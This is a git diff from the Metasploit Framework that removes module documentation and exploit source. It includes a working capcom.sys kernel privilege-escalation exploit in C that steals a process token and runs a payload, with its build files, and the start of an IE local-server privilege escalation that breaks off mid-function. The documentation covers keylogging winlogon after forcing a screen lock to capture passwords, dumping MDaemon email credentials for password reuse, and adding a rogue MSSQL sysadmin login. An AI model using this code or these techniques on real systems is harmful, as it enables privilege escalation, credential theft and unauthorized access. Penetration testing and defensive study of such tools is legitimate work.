-    "placement": {
-      "availability-zone": "us-east-1e"
-    },
-    "profile": "default-hvm",
-    "public-hostname": "ec2-192.168.2.2.compute-1.amazonaws.com",
-    "public-ipv4": "192.168.2.2",
-    "public-keys": {
-      "0": {
-        "openssh-key": "ssh-rsa <...redacted...> jhart"
-      }
-    },
-    "reservation-id": "r-8675309",
-    "security-groups": "launch-wizard-15",
-    "services": {
-      "domain": "amazonaws.com",
-      "partition": "aws"
-    }
-  }
-  [+] Saved AWS EC2 instance metadata to to /Users/jhart/.msf4/loot/20160930065628_default_192.168.2.2_aws.ec2.instance_622503.txt
-  [*] Post module execution completed
-  ```
@@ -1,5 +1,5 @@
-`shell_to_meterpreter` allows you to upgrade a shell session to Meterpreter. It can be launched as
-a post module, or from the `sessions` command. By default, this module will use a reverse
+shell_to_meterpreter allows you to upgrade a shell session to Meterpreter. It can be launched as
+a post module, or from the sessions command. By default, this module will use a reverse
 Meterpreter.

 ## Important Options
@@ -29,7 +29,7 @@ use this.

 **Using sessions -u**

-`sessions -u` is the same as running the post module against a specific session. However, this
+```sessions -u``` is the same as running the post module against a specific session. However, this
 is limited to using the default reverse Meterpreter payload, so you will not be able to use it
 via a pivot.

@@ -46,7 +46,7 @@ Active sessions
  --  ----           -----------  ----------
  1   shell windows               192.168.146.1:4444 -> 192.168.146.128:1204 (192.168.146.128)

-msf >
+msf > 
 ```

 In this demonstration, session 1 is a shell, so we upgrade that:
@@ -125,4 +125,4 @@ msf post(shell_to_meterpreter) > run
 ...
 [*] Command stager progress: 100.00% (102108/102108 bytes)
 [*] Meterpreter session 3 opened (192.168.146.1-192.168.146.128:4433 -> 192.168.1.102:1056) at 2016-04-28 22:50:56 -0500
-```
+```
@@ -1,76 +0,0 @@
-## Overview
-
-This module captures keystrokes from a Windows target and saves them to a text file in loot. Keystrokes can be captured from explorer.exe, winlogon.exe, or a specific process of your choice. The module is capable of being run as a job to keep the Framework's user interface available for other tasks.
-
-## Requirements
- Windows Meterpreter Session
-
-## Module Options
- **CAPTURE_TYPE** - This option sets the process where the module records keystrokes. Accepted: explorer, winlogon, or pid. Default value is explorer.
-
- **INTERVAL** - The interval in seconds that the module uses for recording keystrokes. The log file goes to a new line at the end of each interval. Default value is 5 seconds.
-
- **LOCKSCREEN** - This option locks the screen of the target when set to TRUE. CAPTURE_TYPE must be set to winlogon. MIGRATE must be set to TRUE or the session must already be in winlogon.exe. Defalt value is FALSE.
-
- **MIGRATE** - This option migrates the session based on the CAPTURE_TYPE. Explorer.exe for explorer, winlogon.exe for winlogon, or a specified PID for pid. Default value is FALSE.
-
- **PID** - The PID of a process to migrate the session into. CAPTURE_TYPE of pid must be set, and the sepecified PID must exist on the target machine.
-
- **SESSION** - The session to run the module on.
-
-### Advanced Options
- **ShowKeystrokes** - This option prints the captured keystrokes to the Framework UI on the specified interval. Default is FALSE.
- **TimeOutAction** - This option sets the behavior the module takes if the key capture request times out. (See below.) Accepted: wait or exit. Default value is wait.
-
-## Usage
-The Meterpreter session must be located in an appropriate process for keystroke recording to work properly. This is described in the below-listed capture types. This module can migrate the session if MIGRATE is set to TRUE. If winlogon or PID migration fails, the module will exit. Set MIGRATE to FALSE if migration will be performed manually or through another module. 
-
-### Capture Types
- **Explorer.exe** - __Session must be in explorer.exe__ - The most common capture type. Keystrokes are recorded from most user level applications. Applications running at an elevated level will likely not get recorded. **NOTE: Sessions running with elevated privileges are downgraded to user level when migrated into explorer.exe.** It is recommended that a second session be opened for keystroke recording if elevated priveledges are to be maintained.
-
- **Winlogon.exe** - __Session must be in winlogon.exe__ - Administrator or SYSTEM rights are required to migrate to winlogon.exe. Keylogging from this process records usernames and passwords as users log in. This capture type does not record keystrokes from any other process. Setting LOCKSCREEN to true locks Windows when the module is executed. This forces the user to unlock the computer, and their password is captured.
-
- **PID** - __Session must be in the specific process to be recorded.__ - This option is useful for recording keystrokes in applications or process that run with elevated priveledges. However, admin or SYSTEM rights are required to migrate to these processes. Only keystrokes from the specified process are recorded.
-
-## Running Module as a Job
-It is recommended to run this module as a job using: `exploit -j` or `run -j`. As a job, the module runs in the background preventing it from tying up the Framework's user interface. To stop capturing keystrokes, kill the job using `jobs -k`. The module records the last few keystrokes before exit. Stopping the job can take up to 30 seconds. If the session is killed, the key log job shuts down automatically.
-
-### TimeOutAction
-This module has two actions it can take if module requests time out. This occurs with packet-based payloads like `reverse_http` or `reverse_https` when the target system stops responding to requests for a specific period of time. The default is 300 seconds. Sessions can stop responding due to various events such as network problems, system shut down, system sleep, or user log off.
-
- **WAIT** - With this option selected, the module suspends attempting to gather keystrokes after the timeout. It waits for the session to become active again, then resumes capturing keystrokes. The output log reflects that recording was suspended along with a timestamp. If the session becomes active again, the log indicates this along with a timestamp. The wait option allows keystrokes to be logged over multiple system sleep cycles. In the event that the session dies, the recording job is stopped automatically.
-
- **EXIT** - With this option selected, the module exits and the job is killed when the timeout occurs. The output log reflects the exit along with a timestamp.
-
-### Running Module Stand Alone
-When running the module stand alone, it will prevent the Framework UI from being use for anything else until you exit the module. Use `CTRL-C` to exit. The module will save the last few keystrokes. This may take up to 30 seconds to complete.
-
-## Example Output
-```
-Keystroke log from explorer.exe on JULY with user JULY\User started at 2016-07-13 21:01:56 -0500
-
-This is an ex
-ample output from keylog_recorder.
- <Return>  <Return> On this line I make a typpor <Back>  <Back>  <Back> 
-o. <Return> 
- <Return> Username <Tab> Password <Return> 
- <Return> 
- <N1>  <N9>  <N2>  <Decimal>  <N1>  <N6>  <N8>  <Decimal>  <N1>  <Decimal>  <N1>  <N0>  <N0>  <Return> 
- Copy <Left>  <Left>  <Left>  <Left>  <Ctrl>  <LCtrl> c <Right>  <Right>  <Right>  <Right>  <Return>  <Return>  <Ctrl>  <LCtrl> v <Return>  <Return> 
-
-Keylog Recorder timed out - now waiting at 2016-07-13 21:09:33 -0500
-
-
-Keylog Recorder resumed at 2016-07-13 21:11:36 -0500
-
- <Return> T
-his is keys logged after the computer
- was put to sleep and then woken back up.
- <Return> 
-
-Keylog Recorder exited at 2016-07-13 21:12:44 -0500
-```
-
-
-
-
@@ -1,115 +0,0 @@
-## Vulnerable Application
-
-Download and install the email server: [www.altn.com](http://www.altn.com/Downloads/MDaemon-Mail-Server-Free-Trial/)
-
-You require a valid licence, but there's a demo for 30 days.
-
-### Verified
-
-1. AWS --> Microsoft Windows Server 2012 R2 Base - ami-8d0acfed Instance: t2.micro @ July-August 2016 x64 bits with meterpreter 64 bits.
-2. AWS --> Microsoft Windows Server 2012 R2 Base - ami-8d0acfed Instance: t2.micro @ July-August 2016 x64 bits with meterpreter 32 bits. Worked,  but couldn't find the path through Register.
-3. VM --> Microsoft Windows 7 on VMWare.
-
-## Verification Steps
-
-1. Get a meterpreter on a windows machine that has MDaemon installed.
-2. Load the module: `use post/windows/gather/credentials/mdaemon_cred_collector`
-3. Set the correct session on the module.
-  1. Optional: you can add the remote path of the installation, especially if the software is installed on a strange path and the module can't find it..
-4. Run the module and enjoy the loot.
-
-## Example Run
-**Normal mode**
-```
-msf > use post/windows/gather/credentials/mdaemon_cred_collector 
-msf > set SESSION 1
-msf > exploit 
-```
-
-Output:
-
-```
-[+] Configuration file found: C:\MDaemon\App\userlist.dat
-[+] Found MDaemons on WIN-F7ANP3JL4GJ via session ID: 1
-[*]     Extracted: MDaemon:p0%AhBxvs4IZ
-[*]     Extracted: webmaster:Manuel123.
-[*] SMTP credentials saved in: /root/.msf4/loot/20160831194802_default_127.0.0.1_MDaemon.smtp_ser_754168.txt
-[*]     Extracted: webmaster:Manuel123.
-[*] POP3 credentials saved in: /root/.msf4/loot/20160831194802_default_127.0.0.1_MDaemon.pop3_ser_608271.txt
-[*]     Extracted: webmaster:Manuel123.
-[*] IMAP credentials saved in: /root/.msf4/loot/20160831194802_default_127.0.0.1_MDaemon.imap_ser_769125.txt
-[*] Post module execution completed
-```
-
-**Verbose true**
-```
-msf > use post/windows/gather/credentials/mdaemon_cred_collector 
-msf > set SESSION 1
-msf > set verbose true
-msf > exploit 
-```
-
-Output:
-
-```
-[*] Searching MDaemon installation at C:
-[*] Found MDaemon installation at C:
-[*] Searching MDaemon installation at C:
-[*] Found MDaemon installation at C:
-[*] Searching MDaemon installation at C:\Program Files
-[*] Searching MDaemon installation at C:\Program Files (x86)
-[*] Searching MDaemon installation at C:\Program Files
-[*] Checking for Userlist in MDaemons directory at: C:\MDaemon\App
-[+] Configuration file found: C:\MDaemon\App\userlist.dat
-[+] Found MDaemons on WIN-F7ANP3JL4GJ via session ID: 1
-[*] Downloading UserList.dat file to tmp file: SFJOXMHZEFWA
-[*] Cracking xJiKYdun7OvjVLnM
-[*] Password p0%AhBxvs4IZ
-[*] Cracking ocnTldjRpaejTg==
-[*] Password Manuel123.
-[*] Collected the following credentials:
-[*]     Usernames: 2
-[*]     Passwords: 2
-[*] Deleting tmp file: SFJOXMHZEFWA
-[*]     Extracted: MDaemon:p0%AhBxvs4IZ
-[*]     Extracted: webmaster:Manuel123.
-[*] SMTP credentials saved in: /root/.msf4/loot/20160831194819_default_127.0.0.1_MDaemon.smtp_ser_114741.txt
-[*]     Extracted: webmaster:Manuel123.
-[*] POP3 credentials saved in: /root/.msf4/loot/20160831194819_default_127.0.0.1_MDaemon.pop3_ser_369240.txt
-[*]     Extracted: webmaster:Manuel123.
-[*] IMAP credentials saved in: /root/.msf4/loot/20160831194819_default_127.0.0.1_MDaemon.imap_ser_028427.txt
-[*] Post module execution completed
-```
-
-## Options
-
-  **RPATH**
-  The remote path of the MDaemon installation.
-  If the machine runs on 64bits and the meterpreter is 32 bits, it won't be able to find the installation path in the registry, but it will search some default paths. If it is installed on a non-default path you can give the RPATH and it will work.
-
-## Scenarios
-**Run on all sessions**
-If you wish to run the post against all sessions from framework, here is how:
-
-1. Create the following resource script:
-```
-framework.sessions.each_pair do |sid, session|
-  run_single("use post/windows/gather/credentials/mdaemon_cred_collector")
-  run_single("set SESSION #{sid}")
-  run_single("run")
-end
-```
-2. At the msf prompt, execute the above resource script:
-`msf > resource path-to-resource-script`
-
-**Meterpreter on email server**
-
-If you have a meterpreter running on a server that has MDaemon installed, run the module and you will get all the users and passwords of the email server. Quite useful for trying password reuse and/or checking the strength of the passwords.
-
-Note: MDaemon can store the passwords on a database, in that case the module won't work, but you can search for the database location, username and password and still get them :)
-
-
-## References
-http://www.securityfocus.com/bid/4686
-
-https://github.com/AgoraSecurity/MdaemonCrack
@@ -1,38 +0,0 @@
-## Overview
-
-This post-exploitation module enables you to add a sysadmin to local SQL Server instances, use that login to collect and gather data, and remove the login from the system. 
-
-Pre-2008 versions of MSSQL servers automatically granted local sysadmins admin rights. This changed in MSSQL Server 2008, but there are still ways around to get around it, thanks to this module! If you are able to get domain admin privileges, you'll be able to add yourself to the database domain group and access the server with your newly added account. 
-
-## Basic Workflow
-
-
-1. Get a Meterpreter session using a module like psexec. 
-2. Create a syadmin login on the SQL server.
-3. Log into SQL Server with the newly created login. 
-4. Find and collect data from the server using a module like Microsoft SQL Server Find and Sample Data.
-5. Remove the sysadmin login when you are done. 
-
-
-## Options
-
-The following options are required:
-
- **DB_PASSWORD** - This option sets the password for the new sysadmin login.
- **DB_USERNAME** - This option sets the name for the new sysadmin login. 
- **REMOVE_LOGIN** - This option removes DB_USERNAME from the database. 
- **SESSION** - This option sets the session that you want to use to run this module against. 
-
-## Scenarios
-
-Here's an example of how you can use this module:
-
-```
-meterpreter > use post/windows/manage/mssql_local_auth_bypass
-meterpreter > set DB_USERNAME tacocat
-meterpreter > set DB_PASSWORD 12345
-meterpreter > set SESSION 1
-meterpreter > exploit
-```
-
- 
@@ -1,77 +0,0 @@
-## Example Session
-
-/tmp/hello.cs contains the following:
-
-```
-using System;
-
-public class Hello
-{
-   public static void Main()
-   {
-      Console.WriteLine("Hello, World!");
-   }
-}
-```
-
-To build and run the code:
-
-```
-msf exploit(handler) > use post/windows/manage/powershell/build_net_code
-msf post(build_net_code) > set SESSION -1
-SESSION => -1
-msf post(build_net_code) > show options
-
-Module options (post/windows/manage/powershell/build_net_code):
-
-   Name           Current Setting                                            Required  Description
-   ----           ---------------                                            --------  -----------
-   ASSEMBLIES     mscorlib.dll, System.dll, System.Xml.dll, System.Data.dll  no        Any assemblies outside the defaults
-   CODE_PROVIDER  Microsoft.CSharp.CSharpCodeProvider                        yes       Code provider to use
-   COMPILER_OPTS  /optimize                                                  no        Options to pass to compiler
-   OUTPUT_TARGET                                                             no        Name and path of the generated binary, default random, omit extension
-   RUN_BINARY     false                                                      no        Execute the generated binary
-   SESSION        -1                                                         yes       The session to run this module on.
-   SOURCE_FILE                                                               yes       Path to source code
-
-msf post(build_net_code) > set SOURCE_FILE /tmp/hello.cs
-SOURCE_FILE => /tmp/hello.cs
-msf post(build_net_code) > run
-
-[*] Building remote code.
-[+] File C:\cygwin64\tmp\aNwCFmmLzlYvPWw.exe found, 3584kb
-[+] Finished!
-[*] Post module execution completed
-msf post(build_net_code) > sessions -i -1
-[*] Starting interaction with 1...
-
-meterpreter > shell
-Process 4840 created.
-Channel 7 created.
-Microsoft Windows [Version 10.0.14393]
-(c) 2016 Microsoft Corporation. All rights reserved.
-
-E:\metasploit-framework>C:\cygwin64\tmp\aNwCFmmLzlYvPWw.exe
-C:\cygwin64\tmp\aNwCFmmLzlYvPWw.exe
-Hello, World!
-```
-
-You can also run the code automatically:
-
-```
-msf exploit(handler) > use post/windows/manage/powershell/build_net_code
-msf post(build_net_code) > set SOURCE_FILE /tmp/hello.cs
-SOURCE_FILE => /tmp/hello.cs
-msf post(build_net_code) > set RUN_BINARY true
-RUN_BINARY => true
-msf post(build_net_code) > set SESSION -1
-SESSION => -1
-msf post(build_net_code) > run
-
-[*] Building remote code.
-[+] File C:\cygwin64\tmp\QuEQSEifJOe.exe found, 3584kb
-[+] Hello, World!
-
-[+] Finished!
-[*] Post module execution completed
-```
@@ -1,151 +0,0 @@
-## Ignore Visual Studio temporary files, build results, and
-## files generated by popular Visual Studio add-ons.
-
-# User-specific files
-*.suo
-*.user
-*.sln.docstates
-
-# Build results
-
-[Dd]ebug/
-[Rr]elease/
-x64/
-build/
-[Bb]in/
-[Oo]bj/
-
-# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
-!packages/*/build/
-
-# MSTest test Results
-[Tt]est[Rr]esult*/
-[Bb]uild[Ll]og.*
-
-*_i.c
-*_p.c
-*.ilk
-*.meta
-*.obj
-*.pch
-*.pdb
-*.pgc
-*.pgd
-*.rsp
-*.sbr
-*.tlb
-*.tli
-*.tlh
-*.tmp
-*.tmp_proj
-*.log
-*.vspscc
-*.vssscc
-.builds
-*.pidb
-*.log
-*.scc
-
-# Visual C++ cache files
-ipch/
-*.aps
-*.ncb
-*.opensdf
-*.sdf
-*.cachefile
-
-# Visual Studio profiler
-*.psess
-*.vsp
-*.vspx
-
-# Guidance Automation Toolkit
-*.gpState
-
-# ReSharper is a .NET coding add-in
-_ReSharper*/
-*.[Rr]e[Ss]harper
-
-# TeamCity is a build add-in
-_TeamCity*
-
-# DotCover is a Code Coverage Tool
-*.dotCover
-
-# NCrunch
-*.ncrunch*
-.*crunch*.local.xml
-
-# Installshield output folder
-[Ee]xpress/
-
-# DocProject is a documentation generator add-in
-DocProject/buildhelp/
-DocProject/Help/*.HxT
-DocProject/Help/*.HxC
-DocProject/Help/*.hhc
-DocProject/Help/*.hhk
-DocProject/Help/*.hhp
-DocProject/Help/Html2
-DocProject/Help/html
-
-# Click-Once directory
-publish/
-
-# Publish Web Output
-*.Publish.xml
-*.pubxml
-
-# NuGet Packages Directory
-## TODO: If you have NuGet Package Restore enabled, uncomment the next line
-#packages/
-
-# Windows Azure Build Output
-csx
-*.build.csdef
-
-# Windows Store app package directory
-AppPackages/
-
-# Others
-sql/
-*.Cache
-ClientBin/
-[Ss]tyle[Cc]op.*
-~$*
-*~
-*.dbmdl
-*.[Pp]ublish.xml
-*.pfx
-*.publishsettings
-
-# RIA/Silverlight projects
-Generated_Code/
-
-# Backup & report files from converting an old project file to a newer
-# Visual Studio version. Backup files are not needed, because we have git ;-)
-_UpgradeReport_Files/
-Backup*/
-UpgradeLog*.XML
-UpgradeLog*.htm
-
-# SQL Server files
-App_Data/*.mdf
-App_Data/*.ldf
-
-# =========================
-# Windows detritus
-# =========================
-
-# Windows image file caches
-Thumbs.db
-ehthumbs.db
-
-# Folder config file
-Desktop.ini
-
-# Recycle Bin used on file shares
-$RECYCLE.BIN/
-
-# Mac crap
-.DS_Store
@@ -1,19 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio 2013
-VisualStudioVersion = 12.0.40629.0
-MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "capcom_sys_exec", "capcom_sys_exec\capcom_sys_exec.vcxproj", "{A67BA207-7AAC-4850-BEB1-E7FA07BAC0B1}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Release|x64 = Release|x64
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{A67BA207-7AAC-4850-BEB1-E7FA07BAC0B1}.Release|x64.ActiveCfg = Release|x64
-		{A67BA207-7AAC-4850-BEB1-E7FA07BAC0B1}.Release|x64.Build.0 = Release|x64
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
@@ -1,110 +0,0 @@
-#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
-#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
-#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
-#include "kernel.h"
-
-DWORD WINAPI execute_payload(LPVOID lpPayload)
-{
-	VOID(*lpCode)() = (VOID(*)())lpPayload;
-	lpCode();
-	return ERROR_SUCCESS;
-}
-
-DWORD WINAPI capcom_sys_exec(LPVOID lpPayload)
-{
-	const DWORD PwnControlCode = 0xAA013044;
-	HANDLE driver = INVALID_HANDLE_VALUE;
-	PBYTE payload = NULL;
-
-	do
-	{
-		if (!is_driver_loaded(L"capcom.sys"))
-		{
-			break;
-		}
-
-		if (!prepare_for_kernel())
-		{
-			break;
-		}
-
-		// Get a handle to the capcom.sys driver.
-		driver = CreateFile(TEXT("\\\\.\\Htsysm72FB"), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
-			OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-
-		if (driver == INVALID_HANDLE_VALUE)
-		{
-			break;
-		}
-
-		// get a payload read that should cause it to weep
-		BYTE payloadTemplate[] =
-		{
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // Pointer to the CALL will be set here too
-			0xE8, 0x08, 0x00, 0x00, 0x00,                    // CALL $+8 (causes push of address of steal token)
-			0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // Pointer to the token stealer will go here
-			0x58,                                            // POP RAX - get the address containing the steal token func
-			0xFF, 0x20                                       // JMP [RAX] - call the steal token function
-		};
-
-		payload = VirtualAlloc(0, sizeof(payloadTemplate) + 1, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-
-		if (payload == NULL)
-		{
-			break;
-		}
-
-		// copy the template into the target buffer
-		memcpy(payload, payloadTemplate, sizeof(payloadTemplate));
-
-		// update the template with the relevent info
-		*(PULONG_PTR)payload = (ULONG_PTR)(payload + 8); // point the first 8 bytes to the second 8 bytes
-		*(PULONG_PTR)(payload + 13) = (ULONG_PTR)steal_process_token; // insert the token stealer address
-
-		ULONG_PTR target = (ULONG_PTR)(payload + 8);
-		DWORD bytesReturned = 0;
-		DeviceIoControl(driver, PwnControlCode, &target, 8, payload, 4, &bytesReturned, NULL);
-
-		if (was_token_replaced() && lpPayload)
-		{
-			execute_payload(lpPayload);
-		}
-
-	} while (0);
-
-	if (payload != NULL)
-	{
-		VirtualFree(payload, 0, MEM_RELEASE);
-	}
-
-	if (driver != INVALID_HANDLE_VALUE)
-	{
-		CloseHandle(driver);
-	}
-
-	return 0;
-}
-
-BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
-{
-	BOOL bReturnValue = TRUE;
-	switch (dwReason)
-	{
-	case DLL_QUERY_HMODULE:
-		hAppInstance = hinstDLL;
-		if (lpReserved != NULL)
-		{
-			*(HMODULE *)lpReserved = hAppInstance;
-		}
-		break;
-	case DLL_PROCESS_ATTACH:
-		hAppInstance = hinstDLL;
-		capcom_sys_exec(lpReserved);
-		break;
-	case DLL_PROCESS_DETACH:
-	case DLL_THREAD_ATTACH:
-	case DLL_THREAD_DETACH:
-		break;
-	}
-	return bReturnValue;
-}
@@ -1,107 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <ItemGroup>
-    <ClCompile Include="..\..\..\win_kernel_common\kernel.c" />
-    <ClCompile Include="capcom_sys_exec.c" />
-  </ItemGroup>
-  <ItemGroup>
-    <ClInclude Include="..\..\..\win_kernel_common\kernel.h" />
-    <ClInclude Include="..\..\..\win_kernel_common\windefs.h" />
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{a67ba207-7aac-4850-beb1-e7fa07bac0b1}</ProjectGuid>
-    <RootNamespace>capcom_sys_exec</RootNamespace>
-    <Keyword>Win32Proj</Keyword>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <CharacterSet>MultiByte</CharacterSet>
-    <WholeProgramOptimization>false</WholeProgramOptimization>
-    <PlatformToolset>v120_xp</PlatformToolset>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
-  <ImportGroup Label="ExtensionSettings">
-    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <PropertyGroup Label="UserMacros" />
-  <PropertyGroup>
-    <_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
-    <OutDir>$(Configuration)\$(Platform)\</OutDir>
-    <IntDir>$(Configuration)\$(Platform)\</IntDir>
-    <LinkIncremental>false</LinkIncremental>
-    <GenerateManifest>false</GenerateManifest>
-    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
-    <CodeAnalysisRules />
-    <CodeAnalysisRuleAssemblies />
-    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <IncludePath>$(VC_IncludePath);$(WindowsSdk_71A_IncludePath);../../../win_kernel_common</IncludePath>
-  </PropertyGroup>
-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <ClCompile>
-      <Optimization>MinSpace</Optimization>
-      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
-      <IntrinsicFunctions>false</IntrinsicFunctions>
-      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
-      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CAPCOM_SYS_EXEC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
-      <StringPooling>true</StringPooling>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
-      <FunctionLevelLinking>false</FunctionLevelLinking>
-      <PrecompiledHeader>
-      </PrecompiledHeader>
-      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
-      <ObjectFileName>$(OutDir)\</ObjectFileName>
-      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
-      <WarningLevel>Level3</WarningLevel>
-      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
-      <BufferSecurityCheck>false</BufferSecurityCheck>
-      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
-      <TreatWarningAsError>true</TreatWarningAsError>
-    </ClCompile>
-    <Link>
-      <AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
-      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
-      <IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
-      <IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
-      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
-      <GenerateDebugInformation>false</GenerateDebugInformation>
-      <GenerateMapFile>true</GenerateMapFile>
-      <MapFileName>$(OutDir)\capcom_sys_exec.map</MapFileName>
-      <SubSystem>Windows</SubSystem>
-      <OptimizeReferences>
-      </OptimizeReferences>
-      <EnableCOMDATFolding>
-      </EnableCOMDATFolding>
-      <RandomizedBaseAddress>false</RandomizedBaseAddress>
-      <DataExecutionPrevention>
-      </DataExecutionPrevention>
-      <ImportLibrary>$(OutDir)\capcom_sys_exec.lib</ImportLibrary>
-      <Profile>false</Profile>
-      <ModuleDefinitionFile>
-      </ModuleDefinitionFile>
-      <AdditionalOptions>/ignore:4070</AdditionalOptions>
-    </Link>
-    <PostBuildEvent>
-      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.01 "$(TargetDir)$(TargetFileName)" &gt; NUL
-IF EXIST "..\..\..\..\..\data\exploits\capcom_sys_exec\" GOTO COPY
-    mkdir "..\..\..\..\..\data\exploits\capcom_sys_exec\"
-:COPY
-copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\capcom_sys_exec\"</Command>
-    </PostBuildEvent>
-  </ItemDefinitionGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
-  <ImportGroup Label="ExtensionTargets">
-    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
-  </ImportGroup>
-</Project>
@@ -1,17 +0,0 @@
-<?xml version="1.0" standalone="yes"?>
-<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <PropertyGroup>
-    <SolutionPath>.\capcom_sys_exec.sln</SolutionPath>
-  </PropertyGroup>
-
-  <Target Name="all" DependsOnTargets="x86" />
-
-  <Target Name="x86">
-    <Message Text="x86 is not supported for capcom_sys_exec" />
-  </Target>
-
-  <Target Name="x64">
-    <Message Text="Building capcom_sys_exec x64 Release version" />
-    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
-  </Target>
-</Project>
@@ -1,183 +0,0 @@
-/*
-From: https://gist.github.com/worawit/1213febe36aa8331e092
-
-Simple local HTTP server for IE (with no AppContainer) privilege escalation.
-
-I implemented local server instead of proxy in Ref because 
-local server is easier to code. But local server is less useful then proxy.
-
-Ref:
-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb
-
-Note:
-From my test, by default IE does not configure intranet site.
-With this default, localhost is treated as internet site (run as low integrity).
-*/
-#define _CRT_SECURE_NO_WARNINGS
-#define WIN32_LEAN_AND_MEAN
-#include <winsock2.h>
-#include <stdio.h>
-#include <string.h>
-
-#pragma comment(lib, "ws2_32.lib")
-
-#define SERVER_PORT 5555
-
-static HANDLE hThread = NULL;
-
-static WCHAR stage2file[256];
-
-static SOCKET serverSk = INVALID_SOCKET;
-static SOCKET peerSk = INVALID_SOCKET;
-
-static SOCKET create_server()
-{
-	struct sockaddr_in skAddr;
-	SOCKET sk;
-	int optval;
-
-	sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
-	if (sk == INVALID_SOCKET)
-		return INVALID_SOCKET;
-
-	optval = 1;
-	setsockopt(sk, SOL_SOCKET, SO_REUSEADDR, (char*) &optval, sizeof(optval));
-
-	memset(&skAddr, 0, sizeof(skAddr));
-	skAddr.sin_family = AF_INET;
-	skAddr.sin_port = htons(SERVER_PORT);
-	skAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
-
-	if (bind(sk, (struct sockaddr *) &skAddr, sizeof(skAddr)) != 0)
-		goto on_error;
-
-	if (listen(sk, 5) != 0)
-		goto on_error;
-
-	return sk;
-
-on_error:
-	closesocket(sk);
-	return SOCKET_ERROR;
-}
-
-static int send_all(SOCKET sk, char *buffer, int size)
-{
-	int len;
-	while (size > 0) {
-		len = send(sk, buffer, size, 0);
-		if (len <= 0)
-			return 0;
-		buffer += len;
-		size -= len;
-	}
-
-	return 1;
-}
-
-static int local_server()
-{
-	int len;
-	int totalSize;
-	char buffer[4096];
-	HANDLE hFile = INVALID_HANDLE_VALUE;
-
-	serverSk = create_server();
-	if (serverSk == INVALID_SOCKET)
-		return SOCKET_ERROR;
-
-	while (1) {
-		peerSk = accept(serverSk, NULL, NULL);
-		if (peerSk == INVALID_SOCKET) {
-			continue;
-		}
-
